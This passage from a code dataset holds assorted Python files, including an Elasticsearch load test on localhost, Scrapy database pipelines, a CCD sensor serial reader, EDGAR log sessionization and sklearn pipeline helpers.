SwissProt.read(handle)\n except Exception as e:\n print(i,e)\n if record.organism not in d.keys(): #para casos em que o mesmo organism aparece mais que uma vez no resultado do blast,\n d[record.organism.upper()] = record.sequence #guardamos apenas o primeiro;\n\nseqs_file = open(\"seqs2.fasta\",\"w\") #guardar as sequencias num fasta \nfor key in d.keys():\n seqs_file.write(\">\" + key + \"\\n\" + d[key] + \"\\n\\n\")\n\nseqs_file.close()\n","sub_path":"eif2ak4_phylogeny.py","file_name":"eif2ak4_phylogeny.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"653824536","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#############################################################\n# #\n# Updating the elastic search index with fresh datas. #\n# #\n#############################################################\n\n#============================================================\n#title :filling_index.py\n#description : Filling the elastic search index.\n#author :maha\n#date :2019-04-12\n#version :1.0\n#usage :python filling_index.py <inputfile.json>\n#notes :\n#python_version :3.7.0\n#============================================================\n\nimport os\nimport re\nimport sys\nimport json\nimport getopt\nimport requests\nimport pandas as pd\nfrom faker import Faker\nfrom faker.providers import BaseProvider,person\nfrom elasticsearch import Elasticsearch\n\nimport logging\nimport threading\nimport time\nimport random\n\nes_host = 'http://localhost'\nes_port = 9200\nes_index_name = 'customers'\n\nes = Elasticsearch([{'host': es_host, 'port': es_port}])\n\nfake = Faker()\n\ndf_all = pd.DataFrame(data = [], columns = ['Session','Elapsed','Status', 'ContentSize'])\n\ndef generate_fake_data(fake):\n \n indexRow = {\n \"first_name\": fake.first_name(),\n \"last_name\": fake.last_name(),\n \"address\":fake.street_address(),\n \"phone_number\":fake.phone_number(),\n \"email\":fake.email(),\n \"job\": fake.job(),\n \"company\":fake.company(),\n \"biography\":fake.paragraph(nb_sentences=5, variable_nb_sentences=True, ext_word_list=None)\n }\n\n return indexRow\n\ndef client_insert(fake,number_hits):\n\n global df_all\n \n results = []\n\n url = \"%s:%s/%s/_doc\" % ( es_host, es_port, es_index_name )\n session_name = fake.city()\n\n for i in range(0, number_hits):\n\n fake_data = json.dumps(generate_fake_data(fake))\n\n req = requests.post(url, data= fake_data, headers = {'content-type': 'application/json'})\n\n elapsed = (req.elapsed.microseconds/1000)\n status = req.status_code\n content_size = len( fake_data )\n\n row = [ session_name, elapsed, status, content_size ]\n\n results.append(row)\n \n df = pd.DataFrame(data = results, columns = ['Session','Elapsed','Status', 'ContentSize'])\n\n df_all = df_all.append(df, ignore_index=True)\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n threads = list()\n for index in range(50):\n logging.info(\"Main : create and start thread %d.\", index)\n x = threading.Thread(target=client_insert, args=(fake, int(random.uniform(1000000,2000000)) ))\n threads.append(x)\n x.start()\n\n \"\"\" for index, thread in enumerate(threads):\n logging.info(\"Main : before joining thread %d.\", index)\n thread.join()\n logging.info(\"Main : thread %d done\", index) \"\"\"\n\n df_all.to_csv('results_ldtests.csv', index = False)\n\n","sub_path":"load_test/load_test_append.py","file_name":"load_test_append.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"177287898","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# 管道1 - 打印输出\nclass MaoyanPipeline(object):\n def process_item(self, item, spider):\n print(item['name'], item['time'], item['star'])\n return item\n\n\n# 管道2 - 存入MySQL\nimport pymysql\nfrom .settings import *\n\n\nclass MaoyanMysqlPipeline(object):\n def open_spider(self, spider):\n self.db = pymysql.connect(MYSQL_HOST, MYSQL_USER, MYSQL_PWD, MYSQL_DB, charset=CHARSET)\n self.cursor = self.db.cursor()\n\n def process_item(self, item, spider):\n ins = 'insert into maoyantab values(%s,%s,%s)'\n film_li = [item['name'], item['star'], item['time']]\n self.cursor.execute(ins, film_li)\n self.db.commit()\n\n return item\n\n def close_spider(self, spider):\n self.cursor.close()\n self.db.close()\n\n\n# 管道3 - 存入MongoDB\nimport pymongo\n\n\nclass MaoyanMongoPipeline(object):\n def open_spider(self, spider):\n self.conn = pymongo.MongoClient(MONGO_HOST, MONGO_PORT)\n self.db = self.conn[MONGO_DB]\n self.myset = self.db[MONGO_SET]\n\n def process_item(self, item, spider):\n film_dict = {\n 'name': item['name'],\n 'star': item['star'],\n 'time': item['time'],\n }\n self.myset.insert_one(film_dict)\n","sub_path":"4. Python 爬虫工程师/1. Web Scraping/day08/day08_code/Maoyan/Maoyan/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"199953518","text":"'''\n동전 문제랑 비슷하다.\n12 는 9+1+1+1 로 만들 수 있지만 4+4+4 가 더 최소다.\n즉 모든 경우의 수를 생각해야 한다.\ndp[n] = n일 때의 최소 경우의 수라고 하면\ndp[1] = 1 => 1\ndp[2] = 1+1 => 2\ndp[3] = 1+1+1 => 3\ndp[4] = 4 => 1\ndp[5] = min(dp[4]+1,dp[1]+1)\ndp[12] = min(dp[12-1]+1,dp[12-4]+1,dp[12-9]+1)\n'''\nimport math\n\nN = int(input())\nnums = []\nfor i in range(1,int(math.sqrt(N))+1):\n if i**2 <= N:\n nums.append(i**2)\n\ndp = [0]*(N+1)\ndp[1] = 1\n\nfor i in range(2,N+1):\n result = 100000\n for num in nums:\n if i >= num:\n k=dp[i-num]+1\n if result > k:\n result = k\n dp[i] = result\n\nprint(dp[N])\n","sub_path":"백준/Python/카테고리/다이나믹 프로그래밍/1699(제곱수의 합).py","file_name":"1699(제곱수의 합).py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"531197052","text":"import pytest\nfrom setting import Setting\nfrom modules.BlockBase import BlockBase\nfrom modules.block_alarm import BlockAlarm\n\nSECTION_NAME = \"AlarmBlock\"\n\n\n@pytest.mark.block_alarm\ndef test_block_alarm(logger):\n config = Setting()\n with pytest.raises(TypeError):\n BlockAlarm(None, None)\n with pytest.raises(TypeError):\n BlockAlarm(None, config)\n with pytest.raises(TypeError):\n BlockAlarm(logger, None)\n block = BlockAlarm(logger, config)\n assert block is not None\n assert isinstance(block, BlockBase)\n with pytest.raises(KeyError):\n block.init({})\n\n\n@pytest.mark.block_alarm\ndef test_init(logger):\n config = _get_setting(None)\n block = BlockAlarm(logger, config)\n assert block is not None\n block.init({})\n assert block._blocks is not None\n assert block._alarm_block is not None\n assert block._functions is not None\n\n\ndef _get_setting(name):\n params = {\n \"BlockList\": \"Time\",\n \"List\": \"\",\n }\n config = Setting()\n config.configuration.add_section(SECTION_NAME)\n if name == \"\":\n return config\n section = config.configuration[SECTION_NAME]\n for key, value in params.items():\n section[key] = value.__str__()\n if key == name:\n break\n return config\n","sub_path":"test/xxxx_block_alarm.py","file_name":"xxxx_block_alarm.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"44683708","text":"from chatterbot import ChatBot\nfrom chatterbot.trainers import ListTrainer\n\nchatbot = ChatBot(\"Ron Obvious\")\n\nconversation = [\n \"Hello\",\n \"Hi there!\",\n \"How are you doing?\",\n \"I'm doing fuck.\",\n \"That is good to hear\",\n \"Thank you.\",\n \"You're welcome.\"\n]\n\"\"\"\ncount = 0\nwhile count < 100:\n chatbot.set_trainer(ListTrainer)\n chatbot.train(conversation)\n count += 1\n\"\"\"\nresponse = chatbot.get_response(\"How do you do\")\nprint(response)\n","sub_path":"quick_start.py","file_name":"quick_start.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"481671155","text":"\r\nstring=\"Thisisastring\"\r\n \r\nfor i in range(0,len(string)):\r\n flag=0\r\n for j in range(0,len(string)):\r\n #checking if two charactors are equal\r\n if(string[i]==string[j] and i!=j):\r\n flag=1\r\n break\r\n if(flag==0):\r\n print(string[i],end=\"\")","sub_path":"distint.py","file_name":"distint.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"538841896","text":"import numpy as np\nimport pandas as pd\nfrom joblib import Parallel, delayed\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import FeatureUnion, _fit_transform_one, _transform_one\n\n\nclass DFFeatureUnion(FeatureUnion):\n \"\"\"[EXPERIMENTAL] Wrapper class for FeatureUnion to return Pandas DataFrame \n instead of scipy sparse matrix.\n\n Parameters:\n transformer_list : list of (string, transformer) tuples\n List of transformer objects to be applied to the data.\n\n n_jobs : int, default=None\n Number of jobs to run in parallel.\n\n transformer_weights : dict, default=None\n Multiplicative weights for features per transformer.\n\n verbose : bool, default=False\n If True, the time elapsed while fitting each transformer will be\n printed as it is completed.\n\n Example:\n union = DFFeatureUnion([\n ('num', num_pipe),\n ('cat', cat_pipe),\n ('buc', buc_pipe)\n ])\n \"\"\"\n\n def fit_transform(self, X, y=None, **fit_params):\n self._validate_transformers()\n result = Parallel(n_jobs=self.n_jobs)(\n delayed(_fit_transform_one)(\n transformer=trans,\n X=X,\n y=y,\n weight=weight,\n **fit_params)\n for name, trans, weight in self._iter())\n if not result:\n # All transformers are None\n return np.zeros((X.shape[0], 0))\n Xs, transformers = zip(*result)\n self._update_transformer_list(transformers)\n Xs = self.merge_dataframes_by_column(Xs)\n # get all fitted columns\n self.fitted_columns = Xs.columns\n\n return Xs\n\n def merge_dataframes_by_column(self, Xs):\n return pd.concat(Xs, axis=\"columns\", copy=False)\n\n def transform(self, X):\n X = X.copy()\n Xs = Parallel(n_jobs=self.n_jobs)(\n delayed(_transform_one)(\n transformer=trans,\n X=X,\n y=None,\n weight=weight)\n for name, trans, weight in self._iter())\n if not Xs:\n # All transformers are None\n return np.zeros((X.shape[0], 0))\n X_ = self.merge_dataframes_by_column(Xs)\n # Create data for missing columns\n missing_vars = [\n var for var in self.fitted_columns if var not in X_.columns]\n if len(missing_vars) != 0:\n for var in missing_vars:\n X_[var] = 0\n # Matching transformed column and fitted columns\n X_ = X_[self.fitted_columns].copy()\n return X_\n\n\nclass DFColumnsSelector(BaseEstimator, TransformerMixin):\n\n def __init__(self, columns, dtype=None):\n \"\"\"Select columns from DataFrame.\n\n Args:\n columns (str or list): A list or string of column names.\n dtype (type, optional): Select by data type. Defaults to None.\n \"\"\"\n if not isinstance(columns, list):\n self.columns = [columns]\n else:\n self.columns = columns\n self.dtype = dtype\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X):\n if self.dtype:\n return X[self.columns].astype(self.dtype)\n else:\n return X[self.columns]\n\n\nclass DataFrameUnion(TransformerMixin, BaseEstimator):\n \"\"\"\n In: list of (string, transformer) tuples :\n Out: pd.DataFrame\n \"\"\"\n\n def __init__(self, transformer_list):\n self.feature_names = None\n # (string, Transformer)-tuple list\n self.transformer_list = transformer_list\n\n def __getitem__(self, attrib):\n return self.__dict__[attrib]\n\n def transform(self, X):\n \"\"\"Transform X separately by each transformer, concatenate results.\n Parameters\n ----------\n X : array-like or sparse matrix, shape (n_samples, n_features)\n Input data to be transformed.\n Returns\n -------\n X_t : array-like or sparse matrix, shape (n_samples, sum_n_components)\n hstack of results of transformers. sum_n_components is the\n sum of n_components (output dimension) over transformers.\n \"\"\"\n Xs = (self._transform_one(trans, X)\n for name, trans in self.transformer_list)\n df_merged_result = self._merge_results(Xs)\n return df_merged_result\n\n def fit(self, X, y=None):\n \"\"\"Fit all transformers using X.\n Parameters\n ----------\n :param X: pd.DataFrame\n Input data, used to fit transformers.\n :param y:\n \"\"\"\n transformers = (self._fit_one_transformer(trans, X, y)\n for name, trans in self.transformer_list)\n self._update_transformer_list(transformers)\n return self\n\n def _merge_results(self, transformed_result_generator):\n df_merged_result = ''\n for transformed in transformed_result_generator:\n if isinstance(transformed, pd.Series):\n transformed = pd.DataFrame(data=transformed)\n if not isinstance(df_merged_result, pd.DataFrame):\n df_merged_result = transformed\n else:\n df_merged_result = pd.concat(\n [df_merged_result, transformed], axis=1)\n\n if self.feature_names is None:\n self.feature_names = df_merged_result.columns\n elif (len(self.feature_names) != len(df_merged_result.columns)) or \\\n ((self.feature_names != df_merged_result.columns).any()):\n custom_dataframe = pd.DataFrame(\n data=0, columns=self.feature_names, index=df_merged_result.index)\n custom_dataframe.update(df_merged_result)\n df_merged_result = custom_dataframe\n return df_merged_result\n\n def _update_transformer_list(self, transformers):\n self.transformer_list[:] = [\n (name, new)\n for ((name, old), new) in zip(self.transformer_list, transformers)\n ]\n\n def _fit_one_transformer(self, transformer, X, y):\n return transformer.fit(X, y)\n\n def _transform_one(self, transformer, X):\n return transformer.transform(X)\n","sub_path":"skpdspipe/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"148165962","text":"import queue\nimport threading\nimport time\nimport traceback\nimport serial\nfrom serial.tools import list_ports\nimport numpy as np\n\n\nclass TCD1304(threading.Thread):\n\t\"\"\" A thread for monitoring a COM port. The COM port is\n\t\topened when the thread is started.\n\n\t\tdata_q:\n\t\t\tQueue for received data. Items in the queue are\n\t\t\t(data, timestamp) pairs, where data is a binary\n\t\t\tstring representing the received data, and timestamp\n\t\t\tis the time elapsed from the thread's start (in\n\t\t\tseconds).\n\n\t\terror_q:\n\t\t\tQueue for error messages. In particular, if the\n\t\t\tserial port fails to open for some reason, an error\n\t\t\tis placed into this queue.\n\n\t\tport:\n\t\t\tThe COM port to open. Must be recognized by the\n\t\t\tsystem.\n\n\t\tport_baud/stopbits/parity:\n\t\t\tSerial communication parameters\n\n\t\tport_timeout:\n\t\t\tThe timeout used for reading the COM port. If this\n\t\t\tvalue is low, the thread will return data in finer\n\t\t\tgrained chunks, with more accurate timestamps, but\n\t\t\tit will also consume more CPU.\n\t\"\"\"\n\n\tdata_q = queue.Queue()\n\terror_q = queue.Queue()\n\n\thighSpeedMode = False\n\tintegration = 1\n\ttrigger = False\n\tbuf_sign = 0\n\tloop_sign = 1\n\tlastTime = time.time()\n\tdef __init__(self, highSpeedMode=False, trigger=False, integration=1):\n\t\tthreading.Thread.__init__(self)\n\n\t\tself.highSpeedMode = highSpeedMode\n\t\tself.integration = integration\n\t\tself.trigger = trigger\n\t\tself.serial_port = None\n\t\tself.lock = threading.Lock()\n\t\tself.alive = threading.Event()\n\t\tself.alive.set()\n\t\t#self.lock.acquire()\n\n\tdef run(self):\n\t\ttry:\n\t\t\tif self.serial_port:\n\t\t\t\tself.serial_port.close()\n\t\t\telse:\n\t\t\t\tports = list(list_ports.grep(\"0403:6001\"))\n\t\t\t\tself.port = '/dev/ttyUSB0'\n\t\t\t\tfor i in ports:\n\t\t\t\t\tif i.description == 'TIT 2RCRP':\n\t\t\t\t\t\tself.port = i.device\n\t\t\t\tself.serial_port = serial.Serial(self.port,baudrate=115200,timeout=0.1)#, bytesize=serial.EIGHTBITS,parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,rtscts=False,dsrdtr=False)\n\t\t\t\tself.setTrigger(self.trigger)\n\t\t\t\tself.setIntegration(self.integration)\n\t\t\t\tself.setHighSpeedMode(self.highSpeedMode)\n\n\t\texcept serial.SerialException:\n\t\t\tself.error_q.put(traceback.print_exc())\n\n\t\t\treturn self.error_q\n\n\t\t# Restart the clock\n\t\ttime.clock()\n\t\ttime.sleep(0.1)\n\t\tdata = b''\n\t\twhile self.alive.isSet():\n\t\t\t# Reading 1 byte, followed by whatever is left in the\n\t\t\t# read buffer, as suggested by the developer of\n\t\t\t# PySerial.\n\t\t\t#\n\n\t\t\ttry:\n\n\t\t\t\tdata = self.getData()\n\t\t\t\ttimestamp = time.clock()\n\t\t\t\tself.data_q.put((data, timestamp))\n\t\t\t\ttime.sleep(0.05)\n\t\t\t\t#print(data.sum(),self.error_q.get())\n\n\t\t\texcept (serial.SerialException, OSError) as e:\n\t\t\t\tself.error_q.put(e)\n\t\t\t\tself.stop()\n\n\t\t\t\treturn\n\t\t\t#time.sleep(0.05)\n\t\t# clean up\n\t\tif self.serial_port:\n\t\t\tself.serial_port.close()\n\t\tprint('CCD Stopped')\n\n\tdef setHighSpeedMode(self, active=False):\n\t\tif active:\n\t\t\tself.serial_port.write(b'#CSDTP:0%'+bytearray([0x11,0x13]))\n\t\t\tself.serial_port.write(b'#?data%'+bytearray([0x11,0x13]))\n\t\t\t#for i in range(10):\n\t\t\tself.serial_port.write(b'#CSDTP:1%'+bytearray([0x11,0x13]))\n\t\t\ttime.sleep(1)\n\t\telse:\n\t\t\tpass#self.serial_port.write(b'#CSDTP:0%'+bytearray([0x11,0x13]))\n\n\tdef setTrigger(self, active=False):\n\t\tn = self.serial_port.inWaiting()\n\t\tif n != 0:\n\t\t\tr=self.serial_port.read(n)\t\n\t\t\tprint('#Text:',r)\n\t\tif not active:\n\t\t\t\tself.serial_port.write(b'#Text:0%'+bytearray([0x11,0x13]))\n\t\telif active:\n\t\t\t#for i in range(10):\n\t\t\tself.serial_port.write(b'#Text:1%'+bytearray([0x11,0x13]))\n\t\t\t#self.serial_port.write(b'#Text:1%'+bytearray([0x11,0x13]))\n\n\tdef setIntegration(self, level=1):\n\t\tlevel_str = \"#CCDInt:\";\n\n\t\tif level<=0 or level>100:\n\t\t\t\tlevel = 1\n\t\tstr1 = ''\n\t\tif level<10:\n\t\t\t\tstr1=\"00\"+str(level)\n\t\telif level>=10 and level<100:\n\t\t\t\tstr1=\"0\"+str(level)\n\t\telif level==100:\n\t\t\t\tstr1=str(level)\n\t\tlevel_str=level_str+str1+\"%\";\n\t\tn = self.serial_port.inWaiting()\n\t\tif n != 0:\n\t\t\tr=self.serial_port.read(n)\t\t\n\t\t\tprint('#CCDInt:',r)\n\t\tself.serial_port.write(level_str.encode()+bytearray([0x11,0x13]))\n\t\t#self.serial_port.write(level_str.encode()+bytearray([0x11,0x13]))\n\n\tdef getData(self):\n\t\tccd_vol_array = np.zeros(3648,dtype=int)\n\t\tif not self.highSpeedMode:\n\t\t\tself.serial_port.write(b'#?data%'+bytearray([0x11,0x13]))\n\t\t\tread_buf = self.serial_port.read(1)#7296)\n\t\t\tl = 1\n\t\t\tfor i in range(200):\n\t\t\t\ttime.sleep(0.01)\n\t\t\t\tn=self.serial_port.inWaiting()\n\t\t\t\tread_buf += self.serial_port.read(n)\n\t\t\t\tl+=n\n\t\t\t\tif l == 7296:\n\t\t\t\t\tbreak\n\t\t\t#print(i)\n\t\t\tkk=0\n\t\t\tif len(read_buf) == 7296:\n\t\t\t\tfor i in range(0,8,2):\n\t\t\t\t\tif (read_buf[i]*256+read_buf[i+1])==24930: kk+=1\n\t\t\t\t\tif (read_buf[7288+i]*256+read_buf[7289+i])==24930: kk+=1\n\t\t\t\tif kk>=2:\n\t\t\t\t\tfor i in range(0,7296,2):\n\t\t\t\t\t\t#print(i/2)\n\t\t\t\t\t\tccd_vol_array[int(i/2)]=read_buf[i]*256+read_buf[i+1]\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(1,7295,2):\n\t\t\t\t\t\tccd_vol_array[int((i+1)/2)]=read_buf[i]*256+read_buf[i+1]\n\t\t\t\tccd_vol_array[0]=ccd_vol_array[1]=ccd_vol_array[2]=ccd_vol_array[3]=ccd_vol_array[4]=ccd_vol_array[5]\n\t\t\t\tccd_vol_array[3647]=ccd_vol_array[3646]=ccd_vol_array[3645]=ccd_vol_array[3644]=ccd_vol_array[3643]\n\t\telse:\n\t\t\tread_buf = b''\n\t\t\t\n\t\t\tk=0\n\t\t\t\n\t\t\t\n\t\t\tread_buf = self.serial_port.read(1)\n\t\t\twhile self.loop_sign==1:\n\t\t\t\tl = 1\n\t\t\t\twhile l<=7296:\n\t\t\t\t\tto_read = self.serial_port.inWaiting()\n\t\t\t\t\tread_buf += self.serial_port.read(to_read)\n\t\t\t\t\tl += to_read\n\t\t\t\tprint(l)\n\t\t\t\tprint('max:',max(read_buf))\n\t\t\t\t#time.sleep(5)\n\t\t\t\tfor i in range(to_read-1):\n\t\t\t\t\tprint(read_buf[i])\n\t\t\t\t\tif read_buf[i] == 255 and read_buf[i+1] == 252:\n\t\t\t\t\t\tprint('='*10, read_buf[i:(i+5)])\n\t\t\t\t\t\tp = len(read_buf)-i-1\n\t\t\t\t\t\t\n\t\t\t\t\t\tread_buf = self.serial_port.read(7296-p)\n\t\t\t\t\t\tself.loop_sign = 0\n\t\t\t\t\t\tprint('-'*10)\n\t\t\t\t\t\t#time.sleep(10)\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\tk+=1\n\t\t\t\tprint(k,to_read)\n\t\t\tprint('shift_found')\n\t\t\ttotal_read_buf = read_buf\n\t\t\tif self.loop_sign==0:\n\t\t\t\ttotal_read_buf = self.serial_port.read(7296)\n\t\t\t\t#total_read_buf = self.serial_port.read(7296)\n\t\t\t\tself.loop_sign = 1\n\t\t\tfor i in range(0,7296,2):\n\t\t\t\tccd_vol_array[int(i/2)]=total_read_buf[i]*256+total_read_buf[i+1];\n\t\t\tccd_vol_array[0]=ccd_vol_array[1]=ccd_vol_array[3647]=ccd_vol_array[2];\n\n\t\t\t'''\n\n\t\t\tbuf_sign = 0\n\t\t\ttemp_add=0;\n\t\t\tread_buf_B = []\n\t\t\tread_buf_A = []\n\t\t\ttotal_bytes = 0\n\t\t\ttemp_read_buf = self.serial_port.read(128)\n\n\t\t\tfor k in range(128):\n\t\t\t\tif buf_sign==0:\n\t\t\t\t\tread_buf_B\n\t\t\t\t\t\n\t\t\t'''\n\t\t#print(ccd_vol_array)\n\t\t\n\t\treturn ccd_vol_array\n\n\tdef read(self):\n\t\ttry:\n\t\t\ttime.sleep(0.1)\n\t\t\tdata = self.serial_port.read(1)\n\t\t\t#time.sleep(0.1)\n\t\t\tdata += self.serial_port.read(self.serial_port.inWaiting())\n\t\t\treturn data\n\t\texcept serial.SerialException as e:\n\t\t\tself.error_q.put(e)\n\t\t\treturn\n\n\tdef join(self, timeout=None):\n\t\tself.alive.clear()\n\t\tthreading.Thread.join(self, timeout)\n\n\tdef stop(self):\n\t\tself.alive.clear()\n\n\tdef lock_readout(self):\n\t\tself.alive.wait()\n\t\tself.lock.acquire()\n\n\tdef release_readout(self):\n\t\tself.alive.set()\n\t\tself.lock.release()\n\n\n\n\nif __name__ == '__main__':\n\tfrom pyqtgraph.Qt import QtGui, QtCore\n\timport numpy as np\n\timport pyqtgraph as pg\n\tfrom pyqtgraph.ptime import time as Time\n\timport random\n\tapp = QtGui.QApplication([])\n\n\tp = pg.plot()\n\tp.setWindowTitle('pyqtgraph example: PlotSpeedTest')\n\tp.setYRange(0,45000)\n\tp.setXRange(0,4000)\n\t\n\tp.setLabel('bottom', 'Index', units='B')\n\tcurves = []\n\tcolors = [\"red\",\"green\",\"blue\",\"orange\",\"purple\",\"pink\",\"yellow\"]\n\tfor i in range(100):\n\t\tcurve = p.plot()\n\t\tcurve.setPen(QtGui.QColor(random.choice(colors)))\n\t\t#curve.setFillLevel(2)\n\n\t\tcurves.append(curve)\n\t#curve.setFillLevel(0)\n\n\t#lr = pg.LinearRegionItem([100, 4900])\n\t#p.addItem(lr)\n\tccd = TCD1304(highSpeedMode=False,trigger=True, integration=100)\n\tccd.start()\n\n\tptr = 0\n\tlastTime = Time()\n\tfps = None\n\tt1=0\n\tdef update():\n\t\tglobal curve, data, ptr, p, lastTime, fps, t0, t1\n\t\t\n\t\tt0 = time.time()\n\t\t#print(t0-t1)\n\t\tcn = 0\n\t\tif ccd.data_q.empty():\n\t\t\t#time.sleep(0.2)\n\t\t\treturn\n\t\tstack = ccd.data_q.get()[0]\n\t\twhile not ccd.data_q.empty():\n\t\t\tstack += ccd.data_q.get()[0]\n\t\t\tcn+=1\n\t\t\tprint(\"#\",cn)\n\t\tdata = stack/(cn+1)\n\t\tcurves[0].setData(data)\n\t\t\t\n\t\t#ccd.data_q.clear()\n\t\tptr += 1\n\t\tnow = Time()\n\t\tdt = now - lastTime\n\t\tlastTime = now\n\t\tif fps is None:\n\t\t\tfps = 1.0/dt\n\t\telse:\n\t\t\ts = np.clip(dt*3., 0, 1)\n\t\t\tfps = fps * (1-s) + (1.0/dt) * s\n\t\tp.setTitle('%0.2f fps' % fps)\n\t\tapp.processEvents() ## force complete redraw for every plot\n\t\tt1 = time.time()\n\t\tprint(t1-t0)\n\ttimer = QtCore.QTimer()\n\ttimer.timeout.connect(update)\n\ttimer.start(0)\n\n\n\t## Start Qt event loop unless running in interactive mode.\n\tif __name__ == '__main__':\n\t\timport sys\n\t\tif (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n\t\t\tQtGui.QApplication.instance().exec_()\n","sub_path":"TCD1304.py","file_name":"TCD1304.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"392444956","text":"#!/usr/bin/env python3\n# Copyright 2009-2017 BHG http://bw.org/\n\nfrom datetime import datetime, date, time, timedelta\nimport sys\n\nipSessions = dict()\n\ndef removekey(d, key):\n r = dict(d)\n del r[key]\n return r\n\ndef sessionInactive(session, inactivePeriod, dateTime):\n if session and not session.isActive(inactivePeriod, dateTime):\n return True\n \ndef reportAndDeleteSessions(outFile, conditional = None):\n global ipSessions\n\n if conditional:\n inactivePeriod = conditional[0]\n requestDateTime = conditional[1]\n pred = conditional[2]\n\n if len(ipSessions) > 0:\n for ip,session in ipSessions.items():\n if session and (conditional and pred(session, inactivePeriod, requestDateTime) or not conditional):\n outString = ip+','+session.toString()\n print(outString.rstrip(), file = outFile)\n print(outString)\n ipSessions=removekey(ipSessions,ip)\n \ndef openFile(fileName, mode):\n try:\n return open (fileName, mode)\n except IOError as e:\n sys.exit(\"program failed: Input/Output error: %s\" % ( str(e) ) )\n\n \nclass Session:\n def __init__(self, requestDateTime):\n self._requestCount = 1 \n self._firstRequestDateTime= requestDateTime\n self._lastRequestDateTime = requestDateTime\n\n def docRequests(self):\n return self._requestCount\n \n def isActive(self, inactivePeriod, requestTime):\n if (self._lastRequestDateTime + timedelta(seconds = inactivePeriod) >= requestTime):\n return True\n else:\n return False\n \n #should only be called if is active\n def addDocumentRequest (self, requestDateTime):\n self._requestCount = self._requestCount + 1\n self._lastRequestDateTime=requestDateTime\n \n def toString(self):\n return(self.__str__())\n \n def __str__ (self):\n duration = self._lastRequestDateTime - self._firstRequestDateTime \n return (self._firstRequestDateTime.strftime('%Y-%m-%d %H:%M:%S') + ',' + self._lastRequestDateTime.strftime('%Y-%m-%d %H:%M:%S') + ','\n + str (int(duration.total_seconds()) + 1)+ ',' + str(self.docRequests()) ) \n \ndef main():\n \n in_edgarLog_path = '../insight_testsuite/tests/test_1/input/log.csv' if len(sys.argv) < 4 else sys.argv[1]\n in_edgarLog = openFile(in_edgarLog_path, 'rt')\n \n in_inatctPeriod_path = '../insight_testsuite/tests/test_1/input/inactivity_period.txt' if len(sys.argv) < 4 else sys.argv[2]\n in_inactPeriod = openFile(in_inatctPeriod_path, 'rt')\n\n out_sessionization_path = '../insight_testsuite/tests/test_1/output/sessionization2.txt' if len(sys.argv) < 4 else sys.argv[3]\n out_sessionization = openFile(out_sessionization_path, \"wt\")\n\n inactivityPeriod = int(in_inactPeriod.read())\n \n head = True\n for line in in_edgarLog:\n if head:\n fields = line.rstrip().split(',')\n head = False\n else:\n values = line.rstrip().split(',')\n #Process record if it references a valid document?\n if (values[fields.index('cik')] and values[fields.index('accession')] and values[fields.index('extention')]):\n try:\n ip = values[fields.index('ip')]\n date = values[fields.index('date')]\n time = values[fields.index('time')]\n dateTime = date+'-'+time\n datetime_object = datetime.strptime(dateTime, '%Y-%m-%d-%H:%M:%S')\n reportAndDeleteSessions(out_sessionization, (inactivityPeriod,datetime_object, sessionInactive))\n if ip in ipSessions.keys():\n currentSession = ipSessions.get(ip)\n if currentSession and currentSession.isActive(inactivityPeriod, datetime_object):\n currentSession.addDocumentRequest(datetime_object)\n else: #overwrite IP session record\n ipSessions[ip] = Session (datetime_object)\n else: #create an IP session record\n ipSessions[ip] = Session (datetime_object)\n except Exception:\n print('Invalid EDGAR weblog record: Record Skiped')\n \n reportAndDeleteSessions(out_sessionization)\n\n in_edgarLog.close()\n in_inactPeriod.close()\n out_sessionization.close()\n \n\n \nif __name__ == '__main__': main()\n","sub_path":"src/sessionization.py","file_name":"sessionization.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"101160041","text":"from preprocessing_utils import Preprocessing, ModelImporter\n\nimport torch\n\n\n\nif not __name__ == '__main_':\n\n pre = Preprocessing('digits')\n pre.load_data(filename='test.csv', name='test')\n\n X_df = pre.get(name='test').drop(columns=['0'])\n y_df = pre.get(name='test')['0']\n\n dtype = torch.float\n device = torch.device(\"cpu\")\n\n model_name = 'cnn_digits'\n\n m_importer = ModelImporter('digits')\n\n model = m_importer.load_nn_model(model_name, 0, 10, 100)\n\n X_test = model.reshape_data(torch.tensor(X_df.values, device=device, dtype=dtype))\n y_test = torch.tensor(y_df.values, device=device, dtype=torch.long)\n\n y_pred = model(X_test).argmax(1)\n\n accuracy_soft = (y_pred == y_test).float().mean()\n\n\n print(f'test accuracy 